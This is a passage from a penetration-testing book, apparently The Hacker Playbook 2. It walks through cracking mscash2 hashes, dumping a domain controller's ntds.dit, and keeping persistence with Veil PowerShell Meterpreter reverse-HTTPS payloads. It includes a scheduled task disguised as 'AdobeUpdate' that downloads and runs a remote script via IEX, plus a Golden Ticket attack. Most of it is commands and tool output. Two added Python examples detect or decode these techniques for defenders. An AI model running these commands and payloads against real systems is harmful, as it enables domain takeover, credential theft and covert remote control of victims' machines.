• oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt 


Session.Name...: oclHashcat 
Status.........: Running 
Rules.Type.....: File (rules\InsidePro-HashManager.rule) 
Input.Mode.....: File (lists\crackstat_realhuman_phill.txt) 
Hash.Target....: $DCC2$10240#test1#607bbe89611637446e736f7856515bf8 
Hash.Type......: DCC2, mscash2 
Time.Started...: Thu Jan 29 21:04:21 2015 (1 sec) 
Time.Estimated.: Tue Feb 17 05:18:41 2015 (18 days, 8 hours) 
Speed.GPU.#1...: 135.1 kH/s 
Speed.GPU.#2...: 140.9 kH/s 
Speed.GPU.#*...: 276.6 kH/s 
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts 
Progress.......: 405504/410478832235 (0.00%) 
Skipped........: 0/405504 (0.00%) 
Rejected.......: 0/405504 (0.00%) 
HWMon.GPU.#1...: 99% Util, 45c Temp, N/A Fan 
HWMon.GPU.#2...: 100% Util, 49c Temp, N/A Fan 

Session.Name...: oclHashcat 
Status.........: Aborted 
Rules.Type.....: File (rules\InsidePro-HashManager.rule) 
Input.Mode.....: File (lists\crackstat_realhuman_phill.txt) 
Hash.Target....: $DCC2$10240#test1#607bbe89611637446e736f7856515bf8 
Hash.Type......: DCC2, mscash2 
Time.Started...: Thu Jan 29 21:04:21 2015 (3 secs) 
Time.Estimated.: Thu Feb 19 08:32:47 2015 (20 days, 11 hours) 
Speed.GPU.#1...: 135.0 kH/s 
Speed.GPU.#2...: 140.9 kH/s 
Speed.GPU.#*...: 275.9 kH/s 
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts 
Progress.......: 698368/410478832235 (0.00%) 
Skipped........: 0/698368 (0.00%) 
Rejected.......: 0/698368 (0.00%) 
HWMon.GPU.#1...: 20% Util, 46c Temp, N/A Fan 
HWMon.GPU.#2...: 0% Util, 46c Temp, N/A Fan 

Started: Thu Jan 29 21:04:21 2015 
Stopped: Thu Jan 29 21:04:25 2015 





oclHashcat - mscash2 


We can decide to add a rule to cracking our mscash2 hash with the command: 
• oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt -r rules\InsidePro-HashManager.rule --force 


We are now looking at about 20 days to crack this hash. Although mscash2 hashes are extremely 
valuable, the amount of time it takes to crack might not be feasible on a one-week penetration test. 
This could be used for more long-term attacks. 


Attacking The Domain Controller: 


If you were lucky enough to get a local administrative account or a domain admin account, the next 
target is usually the Domain Controller (DC). One of the happiest moments for any pentester is when 
they successfully pull all the hashes out of the DC. 


Even with administrative credentials, we don't have access to read the hashes on the Domain 
Controller that are stored in the c:\Windows\NTDS\ntds.dit file. This is because that file is 
read-locked as Active Directory constantly accesses it. The solution to this problem is to use the Shadow 
Copy functionality natively in Windows to create a copy of that file. {22} 


SMBExec 
(https://github.com/brav0hax/smbexec) (Kali Linux) 


This is where a tool called SMBExec comes into play. SMBExec, a tool made by brav0hax, grabs the 
SYS registry key (the SYSTEM hive) and the ntds.dit file using the Shadow Copy functionality. Let's take a look at the SMBExec 
module that we installed in the Setting Up Your Box section. 
• Running SMBExec 
  o cd /opt/smbexec 
  o ./smbexec 
• Select 3 for Obtain Hashes 
• Select 2 for Domain Controllers 
• Provide username/hash/domain/IP/NTDS Drive/NTDS Path 





SMBExec - Volume Shadow Copy 


We just saw that SMBExec connected to the Domain Controller with valid credentials, validated 
paths, and attempted to create a Shadow Copy of the ntds.dit and sys files. Once this was completed, 
SMBExec tried to parse through those files and collect and store all the password hashes from LDAP. 


Once SMBExec finishes and is successful, it creates a folder in the same directory based on a date-time 
stamp. If you go into this folder you will see a file called [domain]-dc-hashes.lst. 







SMBExec Results 


Inside the example compromised domain controller, I am able to find the NTLM hashes for the 
following users: 


Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b9e471f83d355eda6bf63524b044870::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
admin account:1000:aad3b435b51404eeaad3b435b51404ee:954bf28f34e47904f5c8725650f27283::: 
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:876c4efd01dbf8da6cd04c60ddac0f95::: 
bobsmith:1105:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589::: 
domainadmin:1106:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589::: 
pmartian:1107:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589::: 


Remember that if you are querying a large domain controller, go grab a coffee, as this will take a 
considerable amount of time. After you collect all these hashes, you can start password cracking or 
utilize the passing of hashes to continually exploit boxes. 


PSExec NTDSgrab 
(http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec_ntdsgrab) (Kali Linux): 


Another great way to dump hashes is with a Metasploit module called psexec_ntdsgrab. Similar to 
SMBExec, psexec_ntdsgrab “authenticates to an Active Directory Domain Controller and creates 
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the ntds.dit file as 
well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM hive copy can be used in 
combination with other tools for offline extraction of AD password hashes. All of this is done without 
uploading a single binary to the target host.” {23} 


With local/domain administrator credentials, let’s grab the domain hashes: 
• msfconsole 
• use auxiliary/admin/smb/psexec_ntdsgrab 
• Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 
• exploit 







Using psexec_ntdsgrab 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file to the /root/.msf4/loot/ 
folder. Next, we will need to convert the dit file to hashes with esedbtool and NTDSextract. 


esedbexport command: 
• How to run: esedbexport -t [Location of Export] [NTDS.dit file] 
• /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 


root@kali:~# /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 
Opening file. 
Exporting table 1 (MSysObjects) out of 14. 
Exporting table 2 (MSysObjectsShadow) out of 14. 
Exporting table 3 out of 14. 
Exporting table 4 (datatable) out of 14. 
Exporting table 5 out of 14. 
Exporting table 6 (hiddentable) out of 14. 
Exporting table 7 (link_table) out of 14. 
[tables 8 to 13 not legible in the source] 
Exporting table 14 (quota_rebuild_progress_table) out of 14. 
Export completed. 








Converting NTDS.dit 


Next we need to run dshashes.py to convert our tables to password hashes. How to run: 
• dshashes.py [datatable table] [link table] --passwordhashes [original bin file from ntdsgrab] 
• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/ntds.export/link_table.7 /tmp/ --passwordhashes /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin 







Extracting Hashes 


This is just another way to dump domain hashes. In various tests, I have had either SMBExec or 
psexec_ntdsgrab not work for some odd reason. In other words, there were times when one tool 
worked while the other tool did not. Therefore, make sure you have both of these tools in your back 
pocket. 


Persistence 


One thing that I skipped in the last book is different ways to create persistence. I have found that there 
are tons of different ways to accomplish this (even the cheap method of dropping the binary in 
startup), but here are a few of my tricks. 


Veil And Powershell 


Veil has been great for evading AV, but it can also create PowerShell Meterpreter executables. I 
really prefer having PowerShell files over actual binaries, just because you never know what AV 
might pick up on. Let’s use Veil to create a quick payload. 

• cd /opt/Veil-Evasion/ 
• ./Veil-Evasion 


First, list all of the available payloads by using the command list: 


Available commands: 

	use         use a specific payload 
	info        information on a specific payload 
	list        list available payloads 
	update      update Veil to the latest version 
	clean       clean out payload folders 
	checkvt     check payload hashes vs. VirusTotal 
	exit        exit Veil 

[>] Please enter a command: list 


Since we want to use Meterpreter Reverse HTTPS, we can pick the following: 
17) powershell/meterpreter/rev_https 


We need to define all the parameters, so that the Meterpreter session can connect back to our host. Set 
the following information: 


Name      Current Value   Description 
LHOST                     IP of the metasploit handler 
LPORT     8443            Port of the metasploit handler 
                          Use system proxy settings 





For example, my Kali Linux host is 172.16.151.140. To set the Local Host: 


[>] set LHOST 172.16.151.140 
[>] Please enter a command: generate 
[>] Please enter the base name for output files: reverse_https 


And your output might look something like the following: 


[*] Your payload files have been generated, don't get caught! 
[>] Press any key to return to the main menu: 









Veil-Framework 


Take a look at the two files created. The reverse_https.bat file will contain what looks to be the 
following: 





PowerShell Encoded Meterpreter 


This is a PowerShell compressed bat file that will detect processor architecture and implement the 
proper PowerShell payload to connect back to your listener. 

The second file is a resource file, as we have seen before, that will automatically set up our handler 
to accept the PowerShell payloads. Kick off the resource file with “msfconsole -r /root/veil-output/handlers/reverse_https_handler.rc". 


[*] Processing /root/veil-output/handlers/reverse_https_handler.rc for ERB directives. 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> use exploit/multi/handler 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set PAYLOAD windows/meterpreter/reverse_https 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set LHOST 172.16.151.140 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set LPORT 8443 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set ExitOnSession false 
resource (/root/veil-output/handlers/reverse_https_handler.rc)> exploit -j 
[*] Exploit running as background job. 
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ 
[*] Starting the payload handler... 
msf exploit(handler) > 


Now you can do a few things here. You can drop that bat file into the startup folder, configure a 
scheduled task to run that PowerShell script, or execute the PowerShell from a command line. 


To run it from a command shell, you need to remove the backslashes (two of them), change the inside 
quotes to ticks, and remove the ending parenthesis. For example, from the reverse_https.bat, we 
stripped out just what we need to execute the Meterpreter (and cleaned up the backslashes, inside 
quotes, and end parenthesis). The benefit of this is that you don’t need to download any PowerShell 
script. The whole payload is compressed in the command below (for 64bit systems): 


%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtb9pIEP7OrxhZe5KtYMe8NE2wIpWSpsIdoTSk...pKRtsdc5C')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" 
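For the analyst on the receiving end of a command line like the one above, this added Python example (not code from the book or from Veil) performs the same FromBase64String, DeflateStream and ASCII chain offline, so the wrapped script can be read without executing it, and names the launcher traits the paragraph lists. The command line it parses is constructed to match the shape above, with the Base64 blob wrapping a harmless Write-Host one-liner rather than a real payload.

```python
"""Offline decoder for the Deflate+Base64 PowerShell cradle shown above.

Added example; it is not code from the book or from Veil. It reproduces in
Python the decode chain the command line performs (FromBase64String ->
DeflateStream(Decompress) -> ASCII) so an analyst can read what a captured
command would have executed without running it. The sample command line
below is constructed; its blob wraps a harmless Write-Host one-liner.
"""
import base64
import re
import zlib
from typing import List, Optional

# [Convert]::FromBase64String('...') or ("...") as it appears in a captured command line.
_B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def deflate_b64_encode(script: str) -> str:
    """Build the kind of blob the cradle consumes: raw Deflate (RFC 1951, no zlib header), Base64."""
    comp = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(comp.compress(script.encode("ascii")) + comp.flush()).decode("ascii")


def deflate_b64_decode(blob: str) -> str:
    """Undo FromBase64String + DeflateStream(Decompress) + ASCII decode."""
    return zlib.decompress(base64.b64decode(blob), wbits=-15).decode("ascii")


def extract_embedded_script(command_line: str) -> Optional[str]:
    """Pull the Base64 argument out of a powershell.exe command line and inflate it.

    Returns None when the line carries no FromBase64String blob; raises
    zlib.error when the blob is not raw Deflate (a different cradle family).
    """
    m = _B64_ARG.search(command_line)
    return deflate_b64_decode(m.group(1)) if m else None


def cradle_indicators(command_line: str) -> List[str]:
    """Name the launcher traits: no profile, non-interactive, hidden window, policy bypass, inline payload."""
    checks = {
        "-nop": "profile suppressed (-NoP)",
        "-noni": "non-interactive (-NonI)",
        "-w hidden": "hidden window (-W Hidden)",
        "-exec bypass": "execution policy bypassed (-Exec Bypass)",
        "deflatestream": "inline compressed payload",
        "frombase64string": "inline Base64 payload",
    }
    lowered = command_line.lower()
    return [desc for needle, desc in checks.items() if needle in lowered]


# Constructed sample: the book's launcher shape, but the blob only wraps a benign one-liner.
BENIGN_SCRIPT = "Write-Host 'hello from the decoded payload'"
SAMPLE_CMDLINE = (
    r"%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass "
    '-Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object '
    "IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('"
    + deflate_b64_encode(BENIGN_SCRIPT)
    + "')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\""
)

if __name__ == "__main__":
    print("indicators:", cradle_indicators(SAMPLE_CMDLINE))
    print("decoded   :", extract_embedded_script(SAMPLE_CMDLINE))
```

`wbits=-15` is what makes this match .NET's DeflateStream, which writes raw RFC 1951 data with no zlib header; feeding the same blob to a plain `zlib.decompress` fails with a header error, which is a quick way to tell this cradle family apart from ones that use GZipStream.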


We can also drop the reverse_https.bat onto the host, put it in the startup folder, and on a successful 
reboot get a full Meterpreter session back to our host: 


msf exploit(handler) > 

[*] 172.16.151.202:49850 Request received for /3gZh... 

[*] 172.16.151.202:49850 Staging connection for target /3gZh received... 

[*] Meterpreter session 2 opened (172.16.151.140:8443 -> 172.16.151.202:49850) at 2015-01-13 
03:02:18 -0500 


Persistence With Scheduled Tasks 


We are going to reuse the PowerSploit Invoke-Shellcode to keep persistence on the host system. 
Because we have limited space in the schtask function and we may want our reverse_https 
Meterpreter sessions to change destination hosts, we are going to modify the Invoke-Shellcode 
PowerShell script and repost it. Once re-posted, we will configure a schtask to run once a day and 
connect back to our Meterpreter handler. {24} 


First we need to grab a copy of invoke-shellcode and modify it. We will use our Kali host machine to 
modify the invoke-shellcode script. 
• cd /opt/PowerSploit/CodeExecution 


As we said before, we are limited in space, so we are going to copy the original file to a shortened 
file: 
• cp Invoke-Shellcode.ps1 1.ps1 


Next, let's go ahead and edit the 1.ps1 script and add our reverse shell information at the bottom of this 
ps1 file. To do this, add the following line while filling in the Listener IP and Port: 
• Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost [LISTENER IP] -Lport [LISTENER PORT] -Force; 


For example, my Metasploit handler is on 192.168.199.128 and listening on port 8443. I add this to 
the last line: 


• Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.199.128 -Lport 8443 -Force; 







Modifying Invoke-Shellcode 


We now have our shortened invoke-shellcode script and can move this file off to a web server. In this 
example, we can just move it to /var/www and start the apache web server: 

• cp 1.ps1 /var/www/ 
• service apache2 start 


Validate this by going to http://[YourIP]/1.ps1 


Generally, I would host this file on a URL shortened site, but for this example, we are just hosting it 
locally. Everything is set up to add persistence to our victim host. All we need is a shell and the 
following command: 


• schtasks /create /tn AdobeUpdate /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://[YourIP]/1.ps1''))'" /SC DAILY /ST 12:00:00 


This creates a schtask named AdobeUpdate that runs at noon everyday to download your modified 
PowerShell script and execute it. Two additional options are: 
• If you have system privileges, you can run the script under SYSTEM. Just add the 
following switch to the above command: 
  o /ru System 
• If you are attacking a 32-bit Windows system, change the PowerShell location in 
your schtask to: 
  o c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 
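From the defender's side, the NTDS.dit dumping covered under Attacking The Domain Controller and the AdobeUpdate scheduled task above both leave distinctive process command lines. The following added Python example (not code from the book, SMBExec, Metasploit or PowerSploit) triages constructed process-creation records for both: the shadow copy, ntds.dit copy and SYSTEM hive save that make up the hash-dump sequence, and schtasks actions that launch a hidden, policy-bypassing PowerShell download cradle. All records, hostnames and the correlation rule are constructed for the example.

```python
"""Process command-line triage for the two activities discussed above.

Added example, not code from the book or from SMBExec, Metasploit or
PowerSploit. It scans constructed process-creation records (the shape of a
Sysmon Event ID 1 or Security 4688 export reduced to host, user and command
line) for (1) the shadow-copy route to ntds.dit and the SYSTEM hive that
SMBExec and psexec_ntdsgrab rely on, and (2) schtasks actions that launch a
hidden, policy-bypassing PowerShell download cradle like the AdobeUpdate
task. Every record below is constructed sample data, not real telemetry.
"""
import re
from typing import Dict, List

# Rule name -> regex applied to the lower-cased command line.
RULES = [
    ("shadow_copy_create", re.compile(r"vssadmin(\.exe)?\s+create\s+shadow|win32_shadowcopy.*create")),
    ("ntds_dit_access", re.compile(r"\\ntds\.dit\b")),
    ("system_hive_save", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b")),
    ("ntdsutil_ifm", re.compile(r"ntdsutil.*\b(ifm|snapshot)\b")),
    ("schtask_ps_cradle", re.compile(
        r"schtasks(\.exe)?\s+/create.*powershell.*(downloadstring|downloadfile|\biex\b|invoke-expression)")),
    ("ps_hidden_bypass", re.compile(
        r"powershell.*-w(indowstyle)?\s+hidden.*-e(p|xec(utionpolicy)?)\s+bypass"
        r"|powershell.*-e(p|xec(utionpolicy)?)\s+bypass.*-w(indowstyle)?\s+hidden")),
]

# Seen together on one host, these three are the SMBExec / ntdsgrab sequence.
NTDS_THEFT_CHAIN = {"shadow_copy_create", "ntds_dit_access", "system_hive_save"}


def triage(record: Dict[str, str]) -> List[str]:
    """Return the names of all rules a single record matches, in RULES order."""
    cmd = record["CommandLine"].lower()
    return [name for name, rx in RULES if rx.search(cmd)]


def hosts_with_ntds_theft_chain(records: List[Dict[str, str]]) -> List[str]:
    """Hosts on which the full shadow-copy + ntds.dit + SYSTEM-hive sequence was observed."""
    seen: Dict[str, set] = {}
    for r in records:
        seen.setdefault(r["Host"], set()).update(triage(r))
    return sorted(h for h, hits in seen.items() if NTDS_THEFT_CHAIN <= hits)


# Constructed records mirroring the commands this chapter describes.
SAMPLE_EVENTS = [
    {"Host": "dc", "User": "HACKER\\lab",
     "CommandLine": r"vssadmin.exe create shadow /for=C:"},
    {"Host": "dc", "User": "HACKER\\lab",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\TEMP\ntds.dit"},
    {"Host": "dc", "User": "HACKER\\lab",
     "CommandLine": r"reg.exe save HKLM\SYSTEM C:\Windows\TEMP\sys"},
    {"Host": "win7", "User": "HACKER\\testuser1",
     "CommandLine": r"""schtasks /create /tn AdobeUpdate /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://[YourIP]/1.ps1''))'" /SC DAILY /ST 12:00:00"""},
    {"Host": "win7", "User": "HACKER\\testuser1",
     "CommandLine": r"powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://[YourIP]/1.ps1'))"},
    {"Host": "win7", "User": "HACKER\\testuser1",
     "CommandLine": r"schtasks /query /fo LIST /v"},
    {"Host": "dc", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for rec in SAMPLE_EVENTS:
        hits = triage(rec)
        if hits:
            print(f"{rec['Host']:5} {rec['User']:20} {', '.join(hits):40} {rec['CommandLine'][:60]}")
    print("ntds.dit theft chain on:", hosts_with_ntds_theft_chain(SAMPLE_EVENTS))
```

The correlation in `hosts_with_ntds_theft_chain` is what separates this sequence from backup software, which also creates shadow copies but does not follow up with a `reg save` of HKLM\SYSTEM and a copy of ntds.dit out of the shadow path; the single-record rules are for the scheduled-task side, where one command line already carries the whole cradle.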


Golden Ticket 


Kerberos is something extremely important to understand. Since explaining exactly how Kerberos and 
Kerberos Tickets work is pretty complicated, I will direct you to a SANS blog article that covers this 
topic well. 


Full Link: 
http://digital-forensics.sans.org/blog/2014/11/24/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-more 





Bit.ly Link: 
http://bit.ly/IDKOkaS 


In short, Kerberos is an authentication and authorization platform built on tickets. What if 
you could create your own tickets to authenticate to any server? That is exactly what the Golden Ticket 
does. On the topic of persistence, let's say you have compromised a Domain Controller in the 
past and dumped all the hashes. Your client tells you a week later that they fixed all the 
vulnerabilities that you identified to get Domain Admin and changed all the passwords. They hire you 
again to see what you can do. You do the normal social engineering to get your initial shell, but now 
you are only a limited user. All the initial entry points are now blocked and they have limited 
scanning detection/prevention. 


With the Golden Ticket, you don't have to worry about anything. You can take the old krbtgt hash 
from the previous hash dump and promote yourself back to a Domain Admin. Best of all, you can do 
all this with an unprivileged account. A few things you need to know about the krbtgt: 
• It is not recommended to reset the system generated password, as it could break the 
whole domain. Therefore, it is generally never changed. (Although Microsoft recently 
released a tool to handle resetting the krbtgt account.) 
• Even if you change every password for every domain admin, you can still become a 
DA. 
• The only time I have seen the system generated password changed is during a domain 
functional level upgrade from 2003 to 2008. 
e You can create Users and Groups that don’t exist with the Golden Ticket. 


So what do you need to perform the Golden Ticket attack? {25} {26} {27} 
• 1) Domain 
  o On a victim host type: whoami 
• 2) Domain Admin User 
  o On a victim host type: net localgroup administrators /DOMAIN 
• 3) Domain SID 
  o On a victim host type: whoami /user 
  o Chop off the last dash and four digits (the RID) 
• 4) krbtgt hash 
  o From a previous hashdump, you just need the second half of the hash 
(just the NTLM hash) 


msf exploit(handler) > sessions -i 2 
[*] Starting interaction with 2... 

meterpreter > shell 
Process 1708 created. 
Channel 2 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation.  All rights reserved. 

C:\Users\testuser1\Desktop>whoami 
hacker\testuser1 

C:\Users\testuser1\Desktop>net localgroup administrators /DOMAIN 
net localgroup administrators /DOMAIN 
The request will be processed at a domain controller for domain hacker.testlab. 

Alias name     administrators 
Comment        Administrators have complete and unrestricted access to the computer/domain 

Members 

------------------------------------------------------------------------------- 
Administrator 
Domain Admins 
Enterprise Admins 
Local Admin 
The command completed successfully. 

C:\Users\testuser1\Desktop>whoami /user 
whoami /user 

USER INFORMATION 
---------------- 

User Name         SID 
================= ============================================== 
hacker\testuser1  S-1-5-21-3525058729-1821581466-2040179600-1106 





Information Needed to Create Golden Ticket 


As seen in prior examples, to get the krbtgt hash, we first had to dump all the domain hashes. This can 
be accomplished using smbexec with a Domain Admin account. Running smbexec, I chose Hash 
Dump and dumped the Domain Controller. 


**************************************************** 
*            smbexec 2.0 - Machiavellian           * 
**************************************************** 
Hash Dump Menu 
1. Domain Controller               172.16.151.200 
2. Workstation & Server Hashes     hacker.testlab\lab 
3. Main menu                       Pass: !Asdfasdfasdf1! 
Choice : 1 

Gather hashes from the Domain Controller's NTDS.dit file. 
Target IP, host list, or nmap XML file [172.16.151.200] : 
Username [lab] : 
Password or hash [<LM>:<NTLM>] [Pass: !Asdfasdfasdf1!] : 
Domain [hacker.testlab] : 
Enter the Drive to save the Shadow Copy and SYS key [C:] : 
Enter the Path to save the Shadow Copy and SYS key [\Windows\TEMP] : 
Enter the Drive where the NTDS.dit file is [C:] : 
Enter the Path to the NTDS.dit file [\Windows\NTDS] : 

sys copied to [smbexec run directory, not legible in the source]/hashes/172.16.151.200/ 
Deleting shadow copy id {[not legible in the source]}... 
Deleting copied files from C:\Windows\TEMP... 
Exporting NTDS file contents, this might take awhile... 





Recovering Hashes from the Domain Controller 


Once completed, a log file will be created with the Domain Hashes. The hash that you will need is 
the second part of the krbtgt hash. 


172.16.151.200.DC.dump.txt (in the smbexec log directory): 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[not legible in the source]::: 
[remaining lines not legible in the source; the krbtgt line is the one needed] 





krbtgt's Hashes 


Now we have everything we need to create the Golden Ticket. Go back to our original shell: 
• First drop into Mimikatz 2.0 
  o use kiwi 
• Create Golden Ticket 
  o golden_ticket_create -u <Domain Admin Username> -d <Domain> -k <krbtgt hash> -s <Domain SID> -t <Location to Drop Golden Ticket> 


meterpreter > use kiwi 
Loading extension kiwi... 
mimikatz 2.0 alpha (x86/win32) release "Kiwi en C" 
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
http://blog.gentilkiwi.com/mimikatz 
Ported to Metasploit by OJ Reeves `TheColonial` 
[!] Loaded x86 Kiwi on an x64 architecture. 
success. 

meterpreter > golden_ticket_create -u lab -d hacker -k 04f3c2fa60ed9f8f30803df6837ebed3 -s S-1-5-21-3525058729-1821581466-2040179600 -t /opt/ticket.txt 
[+] Golden Kerberos ticket written to /opt/ticket.txt 
Creating the Golden Ticket 


That’s it. We now have a Golden Kerberos Ticket. As we said with our scenario before, your client 
SUCK has asked you to come back for a remediation test. You verify that they fixed all the holes from 
last time and passwords are reset, but remember you have the Golden Ticket. 


You use a little spearphishing to get your initial handle into the company with an unprivileged shell. 
You test your access by trying to see if you can read any files on the Domain Controller, but you don’t 
have access. You take a look at your Kerberos tickets and see that you are a limited user. 


Using the Golden Ticket 
• Shell access with limited privileges (does not have to be Local Administrator) 
  o sessions -i [id] 
• Load Mimikatz 2.0 
  o use kiwi 
• Check current Kerberos tickets 
  o kerberos_ticket_list 
• Purge all Kerberos tickets 
  o kerberos_ticket_purge 
• Load our Golden Ticket (stored in /opt/ticket.txt on our Kali VM) 
  o kerberos_ticket_use /opt/ticket.txt 
• Drop into a shell and read files off the DC 
  o shell 
  o dir \\DC\c$ 


Below, we check which Kerberos tickets are currently loaded. Reading the client column, all of 
the tickets belong to testuser1, a limited account. 


[*] Meterpreter session 7 opened (172.16.151.128:8080 -> 172.16.151.202:58204) at 2015-01-08 00:26:18 -0500 

msf exploit(handler) > sessions -i 7 
[*] Starting interaction with 7... 

meterpreter > use kiwi 
Loading extension kiwi... 
mimikatz 2.0 alpha (x86/win32) release "Kiwi en C" 
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
http://blog.gentilkiwi.com/mimikatz 
Ported to Metasploit by OJ Reeves `TheColonial` 
[!] Loaded x86 Kiwi on an x64 architecture. 
success. 

meterpreter > kerberos_ticket_ 
kerberos_ticket_list    kerberos_ticket_purge    kerberos_ticket_use 
meterpreter > kerberos_ticket_list 

Kerberos Tickets 
================ 

Server                                                  Client                      Start Time           Flags 
LDAP/DC.hacker.testlab/hacker.testlab @ HACKER.TESTLAB  testuser1 @ HACKER.TESTLAB  2015-01-08 05:22:32  40a50000 (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE) 
cifs/dc.hacker.testlab @ HACKER.TESTLAB                 testuser1 @ HACKER.TESTLAB  2015-01-08 05:22     40a50000 (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE) 
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB                  testuser1 @ HACKER.TESTLAB  2015-01-08 05:22:23  60a10000 (NAME_CANONICALIZE, PRE_AUTHENT, RENEWABLE, FORWARDED, FORWARDABLE) 
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB                  testuser1 @ HACKER.TESTLAB  2015-01-08 02:11     40e10000 (NAME_CANONICALIZE, PRE_AUTHENT, INITIAL, RENEWABLE, FORWARDABLE) 
ldap/dc.hacker.testlab @ HACKER.TESTLAB                 testuser1 @ HACKER.TESTLAB  2015-01-07 06:42:43  40a50000 (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE) 

Total Tickets : 5 
Current Kerberos Tickets 


We can verify this by dropping into a shell: 


meterpreter > shell 
Process 1524 created. 
Channel 1 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation.  All rights reserved. 

C:\Users\testuser1\Desktop>dir \\dc\c$ 
dir \\dc\c$ 
Access is denied. 


Without Domain Administrative privileges, we can’t log into the Domain Controller. We need to first 
purge all of our current Kerberos tickets. Once purged, we load our Golden Ticket (forged from the krbtgt hash) to obtain a “lab” user 
ticket. From the work prior, we found that the lab account had been part of the Domain Admin group. 


Once we list our tickets again, we see below that we now have a “lab” ticket in our ticket list. 


meterpreter > kerberos_ticket_purge 
[+] Kerberos tickets purged 
meterpreter > kerberos_ticket_use /opt/ticket.txt 
[*] Using Kerberos ticket stored in /opt/ticket.txt, 1093 bytes 
[+] Kerberos ticket applied successfully 
meterpreter > kerberos_ticket_list 

Kerberos Tickets 
================ 
krbtgt/hacker @ hacker   lab @ hacker   2015-01-07 08:37:54.000   2025-01-07 08:37:54.000   (... FORWARDABLE) 

Total Tickets : 1 
meterpreter > 





Importing “lab” Kerberos Tickets 


If we do a listing on the Domain Controller, we can see that we now have full access to the DC. They 
could have changed every user account password after the initial hashdump, but with the krbtgt hash, 
we can create any Kerberos ticket we want. 


meterpreter > shell 
Process 2644 created. 


Channel 7 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\testuser1\Desktop>dir \\DC\C$ 
dir \ \DC\C$ 
Volume in drive \\DC\C$ has no label. 
Volume Serial Number is 40F8-1BB4 


Directory of \\DC\C$ 


08/22/2013 07:52 AM <DIR> PerfLogs 
12/28/2014 02:28 PM <DIR> Program Files 
08/22/2013 07:39 AM <DIR> Program Files (x86) 
01/06/2015 10:52 PM <DIR> Share 
12/28/2014 02:28 PM <DIR> Users 
01/05/2015 01:02 AM <DIR> Windows 

0 File(s) 0 bytes 

6 Dir(s) 20,697,817,088 bytes free 





C:\Users\testuser1\Desktop> 
Accessing the Domain Controller 
